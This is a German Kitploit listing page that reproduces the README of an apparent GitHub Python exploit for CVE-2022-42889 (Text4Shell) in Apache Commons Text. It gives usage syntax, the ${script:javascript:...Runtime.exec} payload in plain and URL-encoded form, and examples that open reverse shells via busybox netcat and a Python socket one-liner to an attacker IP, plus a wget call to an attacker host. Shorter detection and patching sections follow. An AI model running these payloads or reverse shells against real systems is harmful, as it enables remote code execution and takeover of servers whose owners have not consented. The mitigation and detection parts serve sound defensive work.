Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-42889 — Python-Exploit für CVE-2022-42889 (Text4Shell), der Remote-Code-Ausführung über Apache Commons Text-Interpolation ermöglicht. Unterstützt Reverse-Shell-Generierung, SSRF und benutzerdefinierte Befehlsausführung. | Kitploit
Tools/GitHubGitHub/engranaabubakar/cve-2022-42889
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungRemote-Access-Tool
GitHubengranaabubakar/cve-2022-42889

CVE-2022-42889

Python-Exploit für CVE-2022-42889 (Text4Shell), der Remote-Code-Ausführung über Apache Commons Text-Interpolation ermöglicht. Unterstützt Reverse-Shell-Generierung, SSRF und benutzerdefinierte Befehlsausführung.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚀 CVE-2022-42889 (Text4Shell) Exploit

Python 3 License CVE

Ein Python-Exploit für CVE-2022-42889 (Text4Shell), eine kritische Schwachstelle zur Remote-Code-Ausführung in Apache Commons Text vor Version 1.10.0.

📋 Inhaltsverzeichnis

  • Beschreibung
  • Schwachstellendetails
  • Betroffene Versionen
  • Exploit-Funktionen
  • Voraussetzungen
  • Verwendung
  • Beispiele
  • Funktionsweise
  • Erkennung
  • Abhilfe
  • Referenzen
  • Haftungsausschluss

📝 Beschreibung

Dieser Exploit zielt auf CVE-2022-42889 (Text4Shell) ab, eine Schwachstelle in Apache Commons Text, die Remote-Code-Ausführung (RCE) über speziell präparierte Eingabezeichenketten ermöglicht, die vom StringLookup-Interpolator verarbeitet werden.

Die Schwachstelle ist in ihrer Auswirkung ähnlich wie Log4Shell, betrifft jedoch eine andere Bibliothek. Wenn vom Benutzer gesteuerte Eingaben an anfällige Methoden weitergegeben werden, kann ein Angreifer beliebigen Code auf dem Zielsystem ausführen.

🎯 Schwachstellendetails

  • CVE-ID: CVE-2022-42889
  • CVSS-Score: 9,8 (Kritisch)
  • Angriffsvektor: Netzwerk
  • Erforderliche Berechtigungen: Keine
  • Benutzerinteraktion: Keine
  • Auswirkung: Vollständige Systemkompromittierung

Anfällige Komponente

Apache Commons Text bietet Zeichenketteninterpolation über die Schnittstelle StringLookup. Die interpolator-Suche ermöglicht die Auswertung von Ausdrücken mit verschiedenen Präfixen, darunter:

  • ${script:javascript:...} – führt JavaScript-Code aus (Nashorn-Engine)
  • ${url:UTF-8:...} – ruft URLs ab (SSRF)
  • ${dns:...} – DNS-Abfragen

⚠️ Betroffene Versionen

ProduktBetroffene VersionenGepatchete Version
Apache Commons Text< 1.10.01.10.0
Java< 15 (für RCE)15+ (Nashorn deaktiviert)

Hinweis: Java-Versionen ≥ 15 sind nicht anfällig für RCE über das script-Präfix (Nashorn deaktiviert), können aber weiterhin für SSRF über die Präfixe url und dns anfällig sein.

✨ Exploit-Funktionen

  • ✅ Remote-Code-Ausführung (RCE) über JavaScript-Interpolation
  • ✅ Server-Side Request Forgery (SSRF) über URL-Interpolation
  • ✅ URL-Kodierung schädlicher Nutzlasten
  • ✅ Benutzerdefinierte Befehlsausführung
  • ✅ Reverse-Shell-Erzeugung mit LHOST/LPORT
  • ✅ Fehlerbehandlung und Anzeige der Antwort

📦 Voraussetzungen

  • Python 3.6+
  • Bibliothek requests

Abhängigkeiten installieren:

root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python3 text4shell.py -t <ZIEL_IP> -p <PORT> -c <BEFEHL> --lhost <IHRE_IP> --lport <IHR_PORT>

Argumente

💻 Beispiele

Beispiel 1: Einfacher Befehlstest

root@kitploit:~
python3 text4shell.py -t 192.168.1.100 -p 8080 -c "touch /tmp/test" --lhost 192.168.1.50 --lport 4444

Beispiel 2: Reverse Shell mit netcat

root@kitploit:~
# Listener starten
nc -lvnp 4444

# Exploit ausführen
python3 text4shell.py -t 192.168.1.100 -p 8080 -c "busybox nc 192.168.1.50 4444 -e bash" --lhost 192.168.1.50 --lport 4444

Beispiel 3: Python Reverse Shell

root@kitploit:~
python3 text4shell.py -t 192.168.1.100 -p 8080 -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.50\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" --lhost 192.168.1.50 --lport 4444

Beispiel 4: SSRF-Test

root@kitploit:~
python3 text4shell.py -t 192.168.1.100 -p 8080 -c "wget http://192.168.1.50:8000/test" --lhost 192.168.1.50 --lport 4444

🔧 Funktionsweise

Nutzlastaufbau: Das Skript erstellt eine schädliche Zeichenkette mit der Syntax ${script:javascript:...}:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('COMMAND')}

URL-Kodierung: Sonderzeichen werden URL-kodiert, um eine ordnungsgemäße Übertragung sicherzustellen:

root@kitploit:~
%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27COMMAND%27%29%7D

HTTP-Anfrage: Das Skript sendet eine GET-Anfrage an:

root@kitploit:~
http://TARGET:PORT/search?query=ENCODED_PAYLOAD

Befehlsausführung: Bei Anfälligkeit wertet das Ziel das JavaScript aus und führt den Befehl aus.

🔍 Erkennung

Prüfen Sie, ob Ihr System anfällig ist:

Manueller Test:

root@kitploit:~
curl -s "http://target:8080/search?query=\${script:javascript:7*7}"

Wenn die Antwort 49 anstelle von ${script:javascript:7*7} enthält, ist das System anfällig.

Versionsprüfung:

  • CHANGELOG- oder README-Dateien nach Apache Commons Text-Version durchsuchen
  • Suchen Sie nach commons-text-*.jar-Dateien in der Anwendung

🛡️ Abhilfe

Apache Commons Text auf Version 1.10.0 oder höher aktualisieren

root@kitploit:~
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-text</artifactId>
    <version>1.10.0</version>
</dependency>

Auf Java 15+ aktualisieren (deaktiviert die Nashorn-JavaScript-Engine)

Eingabevalidierung: Implementieren Sie eine strenge Validierung von Benutzereingaben.

Interpolation deaktivieren: Wenn nicht benötigt, vermeiden Sie die Verwendung von StringSubstitutor.createInterpolator().

Web Application Firewall (WAF): Blockieren Sie Anfragen, die Muster wie ${script:javascript:} enthalten.

📚 Referenzen

  • NVD - CVE-2022-42889
  • Apache Commons Text Sicherheit
  • Tarlogic - Text4Shell Analyse
  • CISA Warnung

⚠️ Haftungsausschluss

Dieser Exploit dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Die unbefugte Nutzung dieses Exploits gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Werkzeug verursacht werden.

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

🤝 Mitwirken

Beiträge, Probleme und Funktionsanfragen sind willkommen! Besuchen Sie gerne die Issues-Seite.

Happy Hacking! 🚀

Tool herunterladen
ArgumentBeschreibungErforderlich
-t, --targetIP-Adresse des Ziels✅ Ja
-p, --portPort des Ziels (Standard: 8080)❌ Nein
-c, --commandAuszuführender Befehl✅ Ja
--lhostIhre IP für Reverse Shell✅ Ja
--lportIhr Port für Reverse Shell✅ Ja